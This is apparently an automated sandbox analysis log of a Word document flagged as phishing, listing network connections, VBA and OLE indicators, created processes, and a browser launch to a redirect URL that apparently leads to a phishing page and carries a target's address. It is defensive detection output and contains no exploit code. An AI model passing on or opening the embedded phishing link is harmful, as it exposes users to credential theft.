    Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
    Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
    Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
    Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
    Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
    Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
    Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
    Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
    Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
    Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
    Source: unknownHTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.17:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:49714 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49770 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.17:49994 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:50009 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.23.209.157:443 -> 192.168.2.17:50010 version: TLS 1.2
    Source: gostname.xsl.0.drOLE indicator, VBA macros: true
    Source: harvardanglia2008officeonline.xsl.0.drOLE indicator, VBA macros: true
    Source: mlaseventheditionofficeonline.xsl.0.drOLE indicator, VBA macros: true
    Source: iso690.xsl.0.drOLE indicator, VBA macros: true
    Source: chicago.xsl.0.drOLE indicator, VBA macros: true
    Source: ieee2006officeonline.xsl.0.drOLE indicator, VBA macros: true
    Source: APASixthEditionOfficeOnline.xsl.0.drOLE indicator, VBA macros: true
    Source: turabian.xsl.0.drOLE indicator, VBA macros: true
    Source: gosttitle.xsl.0.drOLE indicator, VBA macros: true
    Source: iso690nmerical.xsl.0.drOLE indicator, VBA macros: true
    Source: gb.xsl.0.drOLE indicator, VBA macros: true
    Source: sist02.xsl.0.drOLE indicator, VBA macros: true
    Source: gostname.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: harvardanglia2008officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: mlaseventheditionofficeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: iso690.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: chicago.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: ieee2006officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: APASixthEditionOfficeOnline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: turabian.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: gosttitle.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: iso690nmerical.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: gb.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: sist02.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: classification engineClassification label: mal56.phis.winDOCX@24/414@173/52
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\OfficeJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{93EE127B-E2BE-43AF-88BB-7FB208601885} - OProcSessId.datJump to behavior
    Source: Insight design set.dotx.0.drOLE indicator, Word Document stream: true
    Source: Equations.dotx.0.drOLE indicator, Word Document stream: true
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drOLE indicator, Word Document stream: true
    Source: Element design set.dotx.0.drOLE indicator, Word Document stream: true
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\Pmendon.ext_Reord_Adjustment.docx" /o ""
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Pmendon.ext+goeasy.com
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1976,i,12167023317948266424,17469008393303426487,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5672 --field-trial-handle=1976,i,12167023317948266424,17469008393303426487,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5632 --field-trial-handle=1976,i,12167023317948266424,17469008393303426487,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1976,i,12167023317948266424,17469008393303426487,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5672 --field-trial-handle=1976,i,12167023317948266424,17469008393303426487,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5632 --field-trial-handle=1976,i,12167023317948266424,17469008393303426487,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: Pmendon.ext_Reord_Adjustment.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Pmendon.ext_Reord_Adjustment.docx
    Source: Google Drive.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image2.jpg
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image10.jpeg
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
